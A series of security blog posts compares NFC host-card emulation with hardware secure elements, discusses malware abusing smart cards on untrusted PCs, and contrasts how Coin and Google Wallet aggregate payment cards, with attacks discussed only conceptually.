Dual-interface smart-cards and problem of user intent (part I)

Comparing the security of NFC applications implemented with host-card emulation (HCE) against those using an embedded secure element, we noted that SE hardware architecture allows for interface detection, a critical mitigation against remote relay attacks.  This post expands on another application of the same feature: recognizing user intent in traditional smart card scenarios when they are used in conjunction with an untrusted PC.

Smart-cards and malicious hosts

First a few words on the problem. Consider a standard use-case for smart cards: accessing a remote resource, such as SSH or remote-desktop into another machine in the cloud. In a high-assurance environment that would call for strong authentication– in other words,bg not passwords– using cryptographic keys managed on the card. A typical flow might be:

  • User initiates the action
  • Local machine prompts the user for their smart-card.
  • User inserts their card into the reader (or in the case of NFC, brings it into the field of the reader)
  • PIN prompt is displayed
  • User enters their PIN
  • PIN is relayed to the card to authenticate the user to the card.
  • Once the card application is convinced it is dealing with the legitimate card-holder, it performs a cryptographic operation (such as signing a challenge) to authenticate the user to the remote resource.

When preventing key recovery is not enough

Consider the problem of malware resident on the host PC. Card applications and communication interface are designed to prevent the extraction of secret key material via pure software attacks, such as trying to exploit a memory corruption vulnerability. Let’s posit this is working correctly. Let’s further grant that cryptographic primitives are not vulnerable to side-channel leaks (such as timing differences or padding oracles) that can be used to recover keys using pure software attacks.

Smart-card meets hostile PC

Smart-card interacting with a hostile PC controller by adversary

That rules out the obvious avenue for malware to permanently exfiltrate cryptographic secrets out of the card and ship-them off for future use. But the host can ask the card to perform any operation using those secrets while the card is attached. This is because at the card level there is no concept of “user intent.” Looking at a typical architecture as pictured above, there is a compromised PC running malware controlled by the adversary. A card-reader is attached typically via USB or serial link, and the card is introduced to the reader, allowing the PC to issue commands to the card and receive responses in a standardized format known as APDU. Neither the card reader or card have any indication about the provenance of those APDUs, beyond the obvious fact that they originated from the host. There is no other verifiable indication about which particular application sent those commands, whether that application is acting on behalf of the legitimate card-holder or carrying out its own agenda. In effect, the card is just a passenger along for the ride, with PC software calling the shots on exactly what messages are being signed, decrypted or otherwise processed using the card. After card is attached to the system and the user has authenticate, there is an implicit channel (red-dashes above) available to the malware for issuing arbitrary requests to the card.

Just to drive home the point that this is not a hypothetical scenario– and choice of a US government PIV card for illustrative purposes above is not entirely coincidental: in 2012 AlienVault reported that the Sykipot malware was targeting smart cards  by using a key-logger to capture PINs and later issuing its own set of commands to the card.

Working around PIN checks

Requiring PIN entry, as many card applications do before performing sensitive operations, does not solve this problem.  In the most  common scenario, PIN is entered locally on the compromised PC. This input can be intercepted by malware running at sufficiently high privilege and replayed any time later to authenticate to the card to perform some other private-key operations desired by the attacker.

Consider the more advanced case observed in defense and banking scenarios where an external PIN entry device is used. This is a distinct piece of hardware with its own numeric key-pad. Individual keystrokes are not shipped to the PC but instead the entire PIN is delivered to the card as part of a PIN verification command. (Since the format of that command varies by card application, this must be decided upon in advance and programmed into the PIN-pad firmware.) While this will hide the PIN from  malware resident on the host, it does not stop the malware from free-riding on the authenticated channel after PIN verficiation is done. After all PIN entry is being done at the behest of some application the user started– for example it could be their email client trying to decrypt an encrypted message. There is no social engineering required here; malware can simply wait until the user has legitimate reason to enter their PIN on external device because some other application requested card usage. As long as attacker can take control of that application– which is often doable without special privileges– or more directly, take control of the PC/SC interface controlling all card communication, additional commands can be injected for processing by on-card application.

Towards establishing user intent

Some “card”-like devices in the form of USB tokens have a button or similar input device on the card itself to establish user intent. (In fact there are also cards with their own PIN pad to avoid the untrusted entry path problem; the one button for confirming a transaction is effectively a special case of that design.) This is effectively creating a user nuisance in the name of marginal security. It does prevent the card from being commandeered by malware on host, since sensitive operations requires the user to take action. On the other hand, the user still has no idea what operation is about to be performed when they press the button. For example is the token going to sign the document they submitted or another message chosen by malware? Suppose there is an error message saying the operation did not succeed and needs to be repeated; is there a way to distinguish an “honest” error from malware having hijacked the click for its own purpose?

Interface detection on dual-interface cards can emulate these button presses, but they can do one better by allowing the user to verify exactly what is being requested of the card.

[continued]

CP

 


Is NFC host card-emulation safe for payments? (part II)

[continued from part I]

(Full disclosure: This blogger worked on Google Wallet security)

Card security in perspective: curious case of chip & PIN

Not disturbing the precarious optimal risk equilibrium is one reason EMV adoption has been on a leisurely place in the US. For what seems like a decade, every year has been the year of chip & PIN, when the vaunted technology would finally hit the inflection point. (It may finally be happening in 2015 if the card networks do not blink and stick to their ultimatum for liability switch.) Target and similar large-scale data breaches deserve much of the credit for accelerating the schedule, thanks to negative publicity and decline in consumer confidence– so much that consumers have reported favoring cash in the aftermath of Target breach, a counterproductive reaction that may aggravate risks via theft and loss.

If one focuses on technology alone, it seems puzzling at first why card networks have not embarked on a crash-program to upgrade point-of-sale terminals and cards across the board. After all there is really no comparison in terms of security between swipe and chip transactions. Granted EMV payment protocols are far from perfect: several design flaws have been identified and published in the literature. But even with known (and difficult to fix) defects, chip & PIN represents a major improvement  over swipe transactions, mitigating entire classes of vulnerabilities. But that “puzzle” goes away once the full business impact of  taken into account. Rolling out EMV in a setting that has been used to swipe transactions has been a difficult task. Whatever gains are made locally in reducing fraud may be more than offset by the global cost of the massive undertaking required to upgrade merchants and reissue cards, not to mention user confusion caused by unfamiliar technology– which is another reason why the expected model in the US will involve chip & signature  as opposed to PIN entry, in keeping with the familiar ritual of signing pieces of paper.

HCE and risk management

The parallel with the interminable saga of US chip & PIN adoption is not entirely accurate for HCE/SE. In the first case, chip cards had the formidable problem of displacing a “good enough” installed base. By contrast NFC payments very much remain a green-field, and in principle there is no backwards compatibility problem holding back SE deployment. While merchants have to upgrade to NFC terminals and consumers need to purchase handsets equipped with NFC, once they have made that investment there is no reason to prefer HCE over SE.

In fact the technologically superior solution involving hardware secure elements was first on the scene. It even enjoyed a natural head-start: SE inside a phone represents an incremental evolution of existing standards, leveraging same tried-and-true hardware already deployed in chip & PIN cards, repackaging in slightly different configuration. (Of course reality is not quite that simple: surrounding that secure chip with an always-on, always-connected and highly exposed general purpose computer introduces all sorts of new risk such as remote relay attacks.) By contrast using host-card emulation payments calls for new tokenization standards, designed to compensate for lower security-assurance level of a mobile OS by leaning heavily on online connectivity instead.

So why the frenzy over HCE? Because for the first time it makes contactless payments broadly accessible to enterprising upstarts who were previously marginalized by the “cabal” of secure element manufacturers, TSM operators and wireless carriers. Barrier to entry is lowered to writing an ordinary Android app, along with meeting basic requirements from Visa/MasterCard/AmEx etc. That means more mobile applications developed to run on more mobile devices, carrying credit cards from a wide spectrum of issuers, all adding up to many more transactions by volume and frequency. In other words more interchange fees to go around for all participants in the ecosystem. By contrast the deployment of secure element solutions has been stalled by wireless carriers’ intransigence against Google Wallet, coupled with challenges at executing on their own rival project ISIS– now getting rebranded to avoid confusion with the Iraqi Al-Qaeda faction. (Jury is out on whether the Iraqi terrorist group should be more ashamed of sharing the same name.) As for Google Wallet, its install counts and user-ratings have sky-rocketed after switching to host card emulation. After all, an app that users can not run because of their wireless carrier has precious little utility, no matter how impressed the lucky few are.

What of the alleged decrease in security? By looking at the big picture, we can place the HCE risks in better perspective. First any fraud in question is constrained to card-present in-person transactions, which is quite a bit more difficult to scale than card-not-present transactions that can be conducted from anywhere around the world. (If issuers are careful, they can further constrain potential fraud to NFC transactions only, by blocking the by-design ability to replay NFC track data on a plain magnetic stripe.)  Second, attacks targeting the physical manifestation of the payment instrument– eg magnetic stripe, chip & PIN or mobile device– are only one subset of risks in the system. For example, HCE versus secure-element has no bearing on the safety of merchant terminals. Finally payment networks have defense-in-depth, additional security features designed to detect and prevent attacks that succeed in subverting card security. Most visibly each issuer operates a “back-end” risk engine capable of vetoing transactions even if all of the authorization data from the card looks correct. Defeating the security of the physical payment instrument– be it old-school magnetic stripe or mobile device with NFC– is only the first step: the enterprising fraudster also needs to run the gauntlet of statistical models optimized to detect anomalous spending.

So the argument over HCE amounts to splitting hairs over one very specific attack vector. Gemalto is getting wrapped around the axle over what will be at-worst a negligible increase in fraud. It may even result in a a net decrease by driving adoption of NFC, increasing the percentage of transactions not involving magnetic stripes. To the extent that any one can predict which of these scenarios is more likely to play out, it is the card networks.

CP


Is NFC host card-emulation safe for payments? (part I)

An earlier series of posts compared the security properties of NFC applications implemented using host card-emulation against the same scenario backed by a dedicated hardware secure element. It was not much of a contest; hardware SE easily wins on raw security considerations:

  1. Much stronger tamper-resistance against attacks involving physical access
  2. Greatly reduced attack surface, due to stripped down operating system and locked-down application ecosystem, unlike the anything-goes approach to third-party applications on the average phone
  3. Possible to protect against attacks originating from the host operating system itself
  4. Defense against remote relay attacks using interface detection on the NFC controller

It’s natural to ask: does this mean HCE is not suitable for payments? There have been vocal critics making precisely that claim. NFC Times quotes the Gemalto CEO pursuing this line of argument. Of course Gemalto has a significant business in providing UICC chips– a type of hardware secure element in SIM form factor– to wireless carriers, who are currently making a desperate push for land-grab in the payments space. Having cast its lot with carriers and already reeling from MasterCard/Visa support for HCE, it is not surprising the company does not look kindly on HCE displacing extra hardware. But Gemalto is not alone in trying to “rescue” the world from NFC payments without SE. Whether it is Trustzone or some other snake-oil solution, every vendor seems to have latched on the market failure of secure elements to gain traction as an opportunity to trumpet an alternative to “save” payments from the perils of HCE.

Risk-management versus risk-elimination

First observation is that keeping the fraud level in payments down is a problem of risk management. It is about keeping the frequency and total losses from fraud down to an “optimal level” and distributing the liability appropriately within the system.  More surprising is that optimal level need not be zero, and consumers may be just fine with that arrangement as long as the consequences are not reflected directly on the individual card holder. That second property is important because “optimal” risk can be very different for each participant in the system:

  • Issuing bank who underwrites the card, for example Citibank issuing a MasterCard.
  • Card network facilitating the transactions eg MasterCard.
  • Merchants that accept a particular brand of payment cards
  • Acquiring banks and payment processors helping that merchant accept card transactions
  • Individual card holders

Optimization problem

With the exception of the card-holder, all of these participants are effectively trying to maximize profit. (Strictly speaking, some  issuing banks can be non-profit institutions such as credit unions.) Minimizing fraud is only relevant to the extent that it furthers that objective. This is an important distinction. Earning $100 but losing $10 to fraud may be preferable to earning $50 while only suffering $1 in losses. Granted absolute amounts are not the only concern; increased fraud rates may have second-order effects such as discouraging consumers or merchants from using credit cards. But all of these effects can be quantified. All else being equal, increasing number and dollar-amount of transactions is in the interests of all participants except possibly the card-holder. Security measures designed to combat fraud can end up being counter-productive if they introduce friction, cause transactions to become less reliable or otherwise decrease the revenue stream for the participants. Conversely a technology that is less “safe” in the absolute sense may be preferable for these participants if it boosts overall activity in the ecosystem, provided the attendant fraud can be managed.

Consumer view

Card holders however face a different problem since they can not “average” away profit and loss across many cards. One incident of fraud maxing out a single credit card is a drop in the bucket for Citibank. That same amount can be very significant for the customer involved, enough to wipe out their savings. It doesn’t help that there is great information asymmetry: card networks know a lot about the incidence and impact of fraud while this information is generally not available to consumers, making it difficult to estimate risks. (Is it safe to pay with a credit card online? What about at a street fair?) Worse they have little negotiating power to set terms, other than a rudimentary version of “voting with the wallet” by choosing from offerings from different banks on take-it-leave-it terms.

Fortunately this is where regulation comes in. Consumer protection laws can compensate for the information asymmetry and lack of bargaining power by creating a baseline of  fraud protection that all issuers must adhere to. Such regulations can limit the downside, indemnifying users from losses. The prevailing arrangement in the US via Fair Credit Billing Act (FCBA)  leads to exactly this outcome. Consumers are not liable for fraudulent transactions, a fact that is repeatedly drilled in many an advertisement harping on “zero liability.” Of course what this means more precisely is that we are not directly responsible for reimbursing the issuing bank, merchant or whoever ended up absorbing the loss. Instead those losses are “diffused” across  the system and reflected back to consumers in the form of higher prices at stores (which reflect the expected incidence of charge-backs), higher interest rates on balances carried or greater cut taken by middlemen to offset expected losses.

With consumers effectively neutralized in this manner, card networks have great leverage to move risk around the system, squeezing either banks (unlikely) or more commonly merchants. Similarly they are free to set standards on the design and operation of payment technologies without having to face significant consumer backlash. The average card-holder has little at stake directly to care whether that PIN pad is really living up to its tamper-resistance promise or that point-of-sale terminal is not compromised by malware waiting to skim cards. If there is a security problem anywhere in this chain, it is someone else’s problem to make the consumer whole.

[continued]

CP


Coin vs Google Wallet: security improvements over plastic (part III)

Having looked at how Coin and Google Wallet use different approaches to presenting a wallet experience that can utilize multiple credit cards, this post looks at how they compare against traditional plastic cards in security. Specifically we focus on two common threats both technologies face:

  • Theft/loss of card. This also includes temporary access to the card by the adversary, such as settling a bill at a restaurant when the server gets full access briefly. (Although NFC payments are not typically used in this setting, we can extrapolate to the equivalent hypothetical scenario when the phone is  tapped against a hostile point-of-sale terminal.)
  • Data-breach occurring at a merchant where the card is used, or upstream at the payment processor used by the merchant. Target breach past October and the more recent PF Chang’s breach are examples of the first scenario, while the 2012 attack against Global Payments falls into the latter category.

Theft or loss of device

While Coin is not released yet, from the FAQ and a demonstration video one can surmise two features:

  • The magnetic stripe does not carry card information at all times. It is only visible during transaction time, limiting the window of exposure. If bad guys get hold the card outside that window, there is nothing to read out of the stripe directly. (Contrast this with traditional plastic cards, where the information can be read at any time.)
  • Physical proximity to the phone is required. The card locks up when it is out of range, measured by Bluetooth signal-strength. A corollary is that theft of the card alone is not useful directly, unless the thief also managed to get hold of the phone.

There is a caveat associated with both of these mitigations: they rely on the tamper-resistance of the hardware powering Coin. After all the track-data is still present inside the card, lurking somewhere on persistent storage; it is just not reflected on the dynamic stripe. If an attacker can extract this information by targeting the storage, they could obtain track data for all stored cards. Similar to the problem of extracting the cryptographic keys embedded in a chip & PIN card, this is an attack against the physical tamper-resistance of the hardware. At the moment little is known about the hardware inside Coin. There are standard benchmarks for evaluating the physical security of cryptographic hardware, such as the United States government’s FIPS 140-2 standard and its European counterpart Common Criteria. Popular models of smart-cards often boast a FIPS 140 or CC certification level, and EMV payment applications typically require such a certification before the hardware can be used to implement payment protocols. It is unclear if similar requirements will apply to Coin.

For Google Wallet, the main defense against theft is a PIN. Tap-and-pay is only possible when the application was unlocked “recently” by entering the correct PIN, based on a configurable time interval. In earlier incarnations of the product that leveraged the embedded secure-element, this period defaulted to 5 minutes. More recent versions based on host-card emulation extend that to 24 hours. That means if the user made a transaction recently the device is “armed” and ready for future purchases, by simply turning on the screen. Even unlocking the phone itself– such as by entering a pattern or PIN– is not required. Payments only require that the display is on, which is used as the signal to power-on the NFC controller.

Tamper-resistance used to be an important part of the threat model for earlier versions of Google Wallet, since  long-lived cryptographic keys were stored on the embedded secure element. Physical attacks against the SE could result in the extraction of these keys, allowing “cloning” of the card. (Unlike Coin however, SE hardware has proven track record and pedigree: both NXP SmartMX and Oberthur/ST33 family have underwent Common Criteria evaluation.) But later iterations of Wallet dropped support for SE in favor of NFC host card emulation, managing payment credentials on the main Android application processor. While there is no pretense of tamper-resistance on that platform, HCE also changes the key management model for payments. Instead of trying to secure a single key over an extended period of time, new keys are periodically downloaded from the cloud on-demand, after authenticating the user. This also serves as a useful mitigating factor against theft of the device. Even sophisticated attackers who can extract the secrets associated with an Android application will not be able to create a functional replica.

Skimming and compromised merchants

Google Wallet fares better than Coin against skimming and hostile point-of-sale terminals. Recall that while Coin card can suppress any data from appearing on the magnetic stripe until the moment of transaction, when that swipe does eventually happen, the data surrendered to the reader will be an identical clone of one of the user’s existing cards. Coin FAQ admits as much:

” A Coin is no less susceptible than your current cards to other forms of skimming that capture data encoded in the magnetic stripe as the card is swiped.”

By contrast NFC payments produce a “simulated” track-data with two components that change for each purchase: an incrementing transaction counter and a dynamic card-validation-code or CVC3 computed jointly by the reader and wallet application in a challenge-response protocol. In other words the track-data is constantly changing, unlike the static picture presented by Coin to every cash register. Even if an attacker commands a malicious NFC terminal and observes several different CVC3 values, they can not recreate future CVC3 values necessary to successfully authorize a different transaction. (More details about the construction of the simulated mag-stripe appear in earlier posts about a hypothetical scenario: paying with NFC at Target when the retailer was still under attack– hypothetical because Target has not rolled out NFC.)

Even more importantly, the virtual card used by Google Wallet to redirect payments is completely decoupled from the “real” plastic cards the consumer added to their wallet as funding sources. Nothing about the original cards– not the cardholder name, expiration date or even the types of cards Visa/MC/AmEx/Discover present in the wallet– can be inferred from use of the virtual card. This in itself is very useful when recovering from a breach: even if merchant terminals had been completely compromised a la Target, there is no need to cancel and reissue the physical credit cards of customers who paid with Google Wallet. The only “card” at risk is the virtual one issued by Google for proxying transactions, and it is Google’s problem to reissue that card– which is as easy as provisioning a new one over the air to the phone. Banks who issued the “real,” tangible cards safely hidden on the other side of those transactions need not worry about shipping new pieces of plastic to their customers.

CP


Host-card emulation and interop with multiple NFC wallets

Can multiple NFC tap-and-pay applications coexist on the same phone? The premise may sound overly ambitious, considering that getting even a single wallet to work has been a challenge during this nascent period of mobile payments. Until recently Google Wallet was only available on Sprint and unlocked T-Mobile/AT&T devices, while the ISIS project from US wireless carriers depends on switching to a special SIM card.

This quagmire was caused less by any inherent limitation in technology and more  by strategic maneuvering on the part of wireless carriers and OEMs to control payments. Both the embedded secure element originally used by Google Wallet and the new UICC hardware required for ISIS support the presence of multiple applications, in accord with Global Platform specifications. In principle that permits multiple wallets to co-exist on the same hardware, but the catch is secure elements are locked down platforms. Users can not install their own choice of applications. Special privileges typically obtained via contractual arrangements with the entity controlling the chip are required. Such deals have not materialized at large-scale.

Host-card emulation offers one way out of the quagmire by removing dependency on the secure element. Payment applications no longer require a secure element– only NFC controller– being able to install new apps on that dedicated SE or special privileges for interfacing with SE from an Android application. Does this solve the problem of multiple wallets? That depends on the definition of what it means for multiple wallets to coexist on the same device.

Detour: NFC transactions

Before diving into why having multiple wallets coexisting is still a challenge, here is quick primer on how EMV protocol operates. Starting from the moment the customer brings their device into the induction field of the NFC reader:

  • Terminal detects the presence of an NFC type-4 tag, or what Android calls ISO-Dep type.
  • A connection is set-up for exchanging messages called APDU or Application Protocol Data Unit.
  • Terminal activates the PPSE (Proximity Payment System Environment) application by sending an APDU containing a SELECT command with the well-known AID for PPSE.
  • Terminal interacts with PPSE to get a list of payment instruments available on the “card” (which in this case is actually a phone operating in NFC card-emulation mode) Each instrument is represented by a unique AID, in order of user preference. For example if the user prefers to pay with their Discover and use Visa as fallback in case that is not honored by the merchant, PPSE would present 2 AIDs with the Discover application appearing first.
  • Based on user preferences and merchant capabilities, one of these options is chosen by the terminal.
  • The terminal SELECTs the chosen payment application by AID and executes the network-specific protocol, such as PayPass for MasterCard or payWave for Visa.

One wallet at a time

Screenshot from Android 4.4 showing tap & pay settings

Tap & Pay settings from Kitkat

Designating  a single application for payments is straightforward: Android settings features a dedicated view to pick between available options. Under the hood, that setting controls routing for a specific AID: the one reserved for PPSE. The expectation is that each mobile wallet capable of handling NFC payments will declare that it can handle PPSE and other AID prefixes associated with different networks (for example A0000004 for MasterCard)

There is one subtlety: the syntax used for declaring HCE services permits the application to define groups such that either all or none of the AIDs in that group will be routed to the application. This avoids the situation when PPSE and cards get out of sync. Consider two wallet applications each containing a MasterCard. If the user decides to activate the first one, all future PPSE traffic will be routed there. But if the AID prefix for MasterCard remains associated with wallet #2, an inconsistent transaction state will arise. PPSE emulated by wallet #1 is used to pick a card for payment, but the actual payment is handled by wallet #2, contrary to user preference.

Multiple active wallets

While the scenario for a single NFC payment application is handled gracefully, the same approach does not work for combining multiple cards  from different wallets.

The problem is the directory view presented by PPSE. Because PPSE is routed to one specific wallet, at any point only the payment options associated with that application are available for NFC payments. Each wallet application maintains its own directory of cards, blissfully unaware of other wallets installed on the same device.  Using another card associated with a different mobile payment application requires changing the PPSE routing.

There is no system-wide PPSE instance to aggregate cards from multiple payment applications and create a unified representation to the point-of-sale terminal, containing all the payment options available to that customer. (Strictly speaking, it does not have to be an OS feature. In principle payment apps could agree on a standard among themselves to use Android intents for communicating card information to each other. But this assumes products from competing providers will cooperate for the higher-cause of serving the user, and possibly to their own detriment when a competitor’s payment option is prioritized above their own. This is asking a bit too much, which is why such functionality is best centralized in the core operating system.)

CP


Coin vs Google Wallet: comparing card-aggregation designs (part II)

[continued from part I]

Google Wallet: one more level of indirection

“All problems in computer science can be solved by another level of indirection.” — attributed to computer science pioneer David Wheeler

Google takes a very different approach to supporting multiple cards in a mobile wallet. Instead of carrying a literal representation of all the payment instruments, they are all hidden behind a “virtual card” which can effectively redirect transactions to any of these original credit cards. But this routing is done in real-time via the payment network itself, instead of trying to recreate a bitwise clone of the card.

Google Wallet: using virtual cards to proxy transactions

Google Wallet and virtual cards

Virtual cards

The picture above illustrates how this works, in the context of mobile payments using an Android phone over NFC. (Note that Google also launched an ordinary plastic card in 2013 which has slightly different functionality. In this example we cover the better-known NFC payment scenario where the existence of the virtual card is less obvious.)

Users have one or more backing instruments or funding sources in their wallet. These are standard credit cards, “added” to the conceptual wallet once by entering card-number and other relevant details such as expiration and CVC2 on a web-page or the mobile application, much like one would enter credit-card information when making an online purchase. This step is the rough equivalent of the swipe-magnetic-stripe/photograph/confirm sequence used by Coin when adding cards.  At any given time, exactly one of these backing instruments is active, which is to say the transactions will be charged to the card. Also much like Coin, the Google Wallet mobile app has UI for selecting among the options.

Proxying transactions in real-time

Where the two models diverge despite superficial similarities in UI metaphors is what happens during a transaction. When Google Wallet is used for an in-store NFC purchase, the credit-card seen by the point-of-sale terminal is not any of the actual backing instruments. Instead it is a virtual card, unique to that instance of Google Wallet. Each user and even each instance of the wallet application associated with a given user has its own virtual card provisioned. In one sense, this card is very “real:” it is a full-fledged MasterCard effectively issued on behalf of Google, accepted at any NFC terminal that supports the MasterCard PayPass protocol. It has an ordinary 16-digit card-number with a prefix associated with the MasterCard network, an expiration date and for NFC transactions, cryptographic keys used to generate the dynamic CVC. It is only “virtual” in the sense that its existence is not explicitly surfaced. For example, nowhere in the mobile app are the card-number or other details about this card revealed to the user, although one can often spot the last 4 digits printed on paper receipts. (In principle a determined user could simulate the NFC transaction with their own reader to observe the card-number, since this is part of simulated track-data exchanged in the clear as part of PayPass.) Consequently it is never directly handled by the end-user– never entered into a form on a web-page or recited over the phone. Nor does it ever appear on a consumer credit report as an additional card; much like a prepaid card would not show up as a line of credit.

When a user makes an NFC transaction with Google Wallet, the payment network– MasterCard in this case– will route the authorization request to Google, the nominal issuer of the virtual card. Google will in turn place a payment request on the active backing card for the exact same amount. Pending the outcome of that authorization, the original “front-end” transaction is approved or declined. All of this is done in real-time, and must complete in a matter of seconds to comply with network rules around transaction deadlines.

Two transactions in one

There are interesting consequences to this design. First is that Google plays dual roles:

  • Issuer: As far as the merchant is concerned, Google is the issuer for the card the customer just used. (Nominally Google partners with Bancorp Bank for this purpose, with Bancorp ending up as the issuer of record, as described in the Wallet FAQ entry.)
  • Merchant: As far as the original issuer of the backing card is concerned, Google is a merchant requesting payment authorization from that card.

Second observation is that virtual-card and actual backing instruments are completely decoupled. Unlike in the case of Coin, the Google Wallet virtual card is not a perfect replica of the original card the user added to their wallet. It does not have the same expiration date. They do not share the same name: for NFC transactions, cardholder names–ordinarily part of the emulated track data– are redacted. In fact they may not even be on the same network: the virtual cards are MasterCard but the active funding source could be a Discover or American Express card. This is the illusion created by the virtual card: as far as the customer is concerned, they just paid with their American Express card– even if the merchant does not actually accept AmEx cards, a common situation at small businesses. The merchant on the other hand may be slightly better off in terms of transaction fees. Even if they were accepting AmEx, they will likely pay a lower transaction fee for processing the same amount over MasterCard network, compared to ringing up a “native” AmEx card.

Another interesting property: the transaction types are different. The merchant side experience is a card-present (CP) payment– this is how all NFC tap-payments are treated, no different from swiping the magnetic stripe. Meanwhile the original issuing bank for the backing instrument sees a card-not-present (CNP) transaction from Google, similar to what would happen when making a purchase online by typing card details into a web page. In effect the CP transaction at the point-of-sale was proxied in real-time into a CNP transaction against the backing card.

Other twists are introduced by this two-sided design, such as the handling of disputes and charge-backs, as well as handling merchant-specific rewards such as a credit-card that gives cash-back for purchases made only at gas stations. For our purposes, the key architecture difference between cloning cards (Coin) and proxying transactions in real-time to another card (Google Wallet**) is sufficient to explore questions around how each technology holds up against common fraud-vectors, as well as their future prospects in the face of EMV chip & PIN adoption.

[continued]

CP

** Historical side-note: the first version of Google Wallet in late 2011 did not use virtual cards. Instead users had the option of provisioning their existing Citibank MasterCard or requesting a new prepaid card, also on the MasterCard network. Both of these were “native” cards: transactions were routed directly to the issuer without Google in the loop. From an implementation perspective, each card was represented by a distinct applet on the Android secure element. Virtual cards were introduced in an update the following August, and native cards subsequently deprecated.


Coin vs Google Wallet: comparing card-aggregation designs (part I)

Judging by the excitement around crowd-funded Coin, “card-aggregation”– having a single credit-card that can stand-in for multiple payment instruments– speaks to an unmet market demand. In the abstract the concept hardly seems innovative and already implemented in various online approximations. Many online  services such as PayPal perform exactly this service in the context of web payments. Users can load their PayPal account from traditional debit/credit cards or ACH transfers from a checking account, and later get to spend the funds at any merchant accepting PayPal. But that model requires a change on the merchant side to integrate the new payment method; PayPal transactions look very different from standard credit or debit payments to the merchant. Also customers typically fund a stored-balance account ahead of time, floating money to the payment provider and committing to the payment source long before the actual transaction time. It is a lot more tricky to support real-time card aggregation in the context of existing card networks and even more difficult to implement that for in-person payments at a bricks-and-mortar location as opposed to online transactions. (Prepaid cards suffer from the same problems as PayPal: requirement for advance funding.)

Coin is not the first company to tackle this problem but it has gotten a lot more traction than previous attempts which for the most part, never went beyond a technology demonstration. One possible exception is Google Wallet. In 2012 Google introduced a different approach for combining multiple payment credit-cards in a single mobile wallet. [Full-disclosure: this blogger worked on Google Wallet.] These two products make for an interesting comparison, attempting to create the same user-experience with diametrically opposed designs under-the-hood.

Coin: commercializing the dynamic mag-stripe

Coin is an example of the programmable magnetic-stripe (also called “dynamic magnetic stripe”) technology, covered earlier on this blog. When credit cards are swiped, the point-of-sale terminal reads information encoded on a thin-film made of magnetized material on the back of the card. That information is used to request payment authorization from the card network. The physical layout as well as logical format for this is standardized by ISO/IEC 7813. Informally the format is often referred to as track-data, because it is organized into three tracks with only the first two used on payment cards.

For vanilla plastic cards the contents of the magnetic stripe never change. They are written once at the time of issuance and remain fixed for the lifetime of the payment instrument. About the only change that can occur is unintended and detrimental: when the card comes into contact with a very strong magnetic field, that can lead to erasure of encoded data, resulting in an unreadable card much to the chagrin of the cardholder. This basic technology remained unchanged for decades, until around 2010 when programmable magnetic stripes made their commercial debut. These use a small embedded processor on the card to change the encoded data on demand. It’s clear this technology allows the realization of many advanced concepts, such as single-use card numbers or even single-use track data for a fixed card number that would be immune against skimming. (One could even implement a variation on the mag-stripe profile of EMV, by simulating an internal counter and reader-challenge to output track data containing  dynamic CVC3.)

Coin implements a more elementary scenario: switching between track-data copied from multiple cards, in order to “simulate” any one of these cards. Coin relies on what is arguably a security flaw in the design of magnetic-stripe cards: it is trivial to clone them. Information encoded on the stripe is fixed and readable by anyone in possession of inexpensive off-the-shelf equipment. Anyone can create a new card with exactly the same data– and consequently the same spending authority as the original card, when it is swiped for a purchase.

Abstract architecture of Coin

Coin card model for aggregating multiple cards

Card-cloning, grassroots approach

When journalists speak of card-skimming attacks against ATMs and point-of-sale terminals, usually they are referring to gangs installing malicious software or physically tampering with reader hardware to steal magnetic-stripe data for any card swiped at that location. Armed with that information, the criminals can create duplicate cards bearing same track-data and attempt fraudulent purchases with these clones. (There are additional complications of course: the cards need additional features to look legitimate, such as appropriate logos, holograms, embossed card-holder name etc. Also CVC2 is not present on the magnetic stripe, as such the “clone” is only usable for card-present transactions.)

Coin institutionalizes that practice, except this time cloning is done by the cardholder for his/her own convenience/benefit.

The product has not been released to the general public at the time of writing, but extensive FAQs and a lengthy demonstration given to TechCrunch conveys the general approach taken for provisioning. Users are given card readers– similar to the ubiquitous white Square readers– that interface with their iPhone/Adroid device. Existing plastic cards are swiped to extract their track-data. A mobile app then syncs the information over Bluetooth to the Coin card where it is stored. Shortly before a transaction, that same mobile app allows choosing among cloned cards. Dynamic magnetic-stripe is then reconfigured to present a perfect copy of the same track-data as found on the original card.

[continued at part II]

CP

 


Follow

Get every new post delivered to your Inbox.

Join 47 other followers